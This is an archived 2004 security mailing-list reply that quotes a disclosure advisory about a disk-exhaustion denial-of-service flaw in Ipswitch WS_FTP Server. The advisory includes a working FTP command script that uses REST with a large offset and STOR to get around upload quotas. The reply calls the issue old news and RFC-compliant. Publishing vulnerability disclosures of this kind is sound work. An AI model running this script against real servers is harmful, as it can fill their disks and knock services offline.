[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <4060C615.2010607@home.se>
Date: Wed, 24 Mar 2004 00:19:49 +0100
From: exon <exon@...e.se>
To: Hugh Mann <hughmann@...mail.com>
Cc: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com,
info@...witch.com, secure@...witch.com
Subject: Re: How to crash a harddisk - the Ipswitch WS_FTP Server way
This is old news.
It is also RFC compliant behaviour, even though admitted silly.
/exon
Hugh Mann wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Advisory Name: How to crash a harddisk - the Ipswitch WS_FTP Server way
> Impact : Denial of Service
> Discovered by: Hugh Mann hughmann@...mail.com
> Tested progs : Ipswitch WS_FTP Server 4.0.2.EVAL
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>
> Description
> ~~~~~~~~~~~
> It's possible for any user with write access to a directory, even when
> there's a limit to how much data the user can upload, to use up all
> available disk space on any partition it can upload to. Even a slow
> modem user can do this because the user only needs to send a few bytes
> to the server.
>
> Details
> ~~~~~~~
> The REST command is used to change the file pointer where new data
> will be written to the file next time the user sends an upload command
> such as STOR. A user can create arbitrary sized files (up to 2^64-1
> bytes) by specifying a large value as the argument to REST and then
> sending a small file with STOR.
>
> WS_FTP Server doesn't count the extra bytes starting from the end of
> the original file to the new file pointer location when checking if
> the user can upload more bytes. The next time the user tries to upload
> a file, WS_FTP Server will give an error.
>
> Exploit
> ~~~~~~~
> Save this in a file called ftpcmds.txt, after changing the FTP server
> name, username, and password.
>
> <<<<<<<<<<<<
> open ftp.server.mob
> username
> password
> !echo.>2byte.txt
> !echo.>2byte_2.txt
> dir
> put 2byte_2.txt
> dir
> del 2byte_2.txt
> quote REST 1073741822
> put 2byte.txt
> dir
> put 2byte_2.txt
> del 2byte.txt
> del 2byte_2.txt
> !del 2byte.txt
> !del 2byte_2.txt
> quit
>
>>>>>>>>>>>>>
>
> Then start it:
>
> C:\>ftp -s:ftpcmds.txt
>
> to see the result. It will create a 1GB file and then delete it.
>
> _________________________________________________________________
> Is your PC infected? Get a FREE online computer virus scan from
> McAfee® Security.
> http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
>
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists